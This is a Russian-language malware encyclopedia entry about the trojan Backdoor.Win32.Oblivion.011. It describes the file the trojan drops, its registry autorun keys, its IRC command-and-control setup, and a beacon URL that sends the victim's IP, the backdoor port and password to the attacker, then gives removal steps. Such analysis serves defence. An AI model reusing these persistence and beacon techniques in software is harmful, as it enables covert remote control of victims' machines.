Backdoor.Win32.Oblivion.011

Материал из Total Malware Info

Перейти к: навигация, поиск

Backdoor.Win32.Oblivion.011 Троянская программа. Является приложением Windows (PE-EXE файл). Имеет размер 8 736 байт. Упакована при помощи UPX. Распакованный размер около 18 КБ байт.

Инсталляция

При запуске бэкдор копирует свое тело в системный каталог: 

%System%\iexpIore.exe

Для автоматического запуска при следующем старте системы добавляет ссылку на свой исполняемый файл в ключи автозапуска системного реестра: 

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Default web browser"="%System%\iexpIore.exe"

[HKLM\Software\Microsoft\Windows\CurrentVersion\RunService]
"Default web browser"="%System%\iexpIore.exe"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"run"="iexpIore.exe"
"load"="iexpIore.exe"

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe iexpIore.exe"

Создает ключ реестра: 

[HKLM\Software\Microsoft\Active Setup\Installed Components\Default web browser]
"StubPath"= "%System%\iexpIore.exe ASC"

Деструктивная активность

Бэкдор пытается скрыть свой процесс из системного списка процессов с помощью функции "RegisterServiceProcess" Запускает IRC сервер на компьютере пользователя на TCP порте со случайно выбранным номером. Уведомляет об этом злоумышленника открывая следующий URL в котором передает информацию о системе пользователя: 

wwp.mirabilis.com/scripts/WWPMsg.dll?from=Mini+Oblivion&fromemail=Ratpack@Oblivion.com&subject=Mini+Oblivion+Online&body=[Port=<порт_который_слушает_бэкдор>]+[IP=<ip_адрес_машины пользователя>]+[ServerName=<имя_IRC_сервера_к_которому_подсоединился_бэкдор>]+[WinVer=<версия_ОС>]+[ComputerName=<имя_компьютера>]+[Pass=<пароль_для_подключения_к_бэкдору>]+[Version=0.1.1]&to= HTTP/1.0

Подключившись к запущенному, на компьютере пользователя, IRC серверу, злоумышленник может посылать управляющие команды и управлять бэкдором. Если сервер запустить не удалось, пытается соединиться с IRC сервером"irc.dal.net" и зайти на канал с именем "#whozyerdaddy", после чего переходит в режим ожидания команд. С помощью данного бэкдора злоумышленник может удаленно выполнять следующие манипуляции на компьютере пользователя:

  • Загружать файлы на компьютер пользователя.
  • Запускать любые программы.
  • Добавлять ссылки на загруженные файлы в ключи автозагрузка системного реестра:
    • [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKCU\Software\Microsoft\Active Setup\Installed Components]

а так же в секцию автозагрузки файла WIN.INI: 

[windows]
run=<ссылка на загруженный файл>
load=<ссылка на загруженный файл>

и в секцию автозагрузки файла SYSTEM.INI : 

[boot]
shell=<ссылка на загруженный файл>

Рекомендации по удалению

  1. При помощи «Диспетчера задач» завершить процесс бэкдора:
    2.  iexpIore.exe
  2. Удалить оригинальный файл бэкдора (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  3. Удалить файл
    4. %System%\iexpIore.exe
  4. Удалить параметры из ключей реестра :
    5. "Default web browser"="%System%\iexpIore.exe"

[HKLM\Software\Microsoft\Windows\CurrentVersion\RunService]
"Default web browser"="%System%\iexpIore.exe"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"run"="iexpIore.exe"
"load"="iexpIore.exe"
  5. Изменить значение ключа реестра на следующее:
    6. [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
  6. Удалить ключ реестра:
    7. [HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\Default web browser]
Источник — «http://www.totalmalwareinfo.com/rus/Backdoor.Win32.Oblivion.011»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.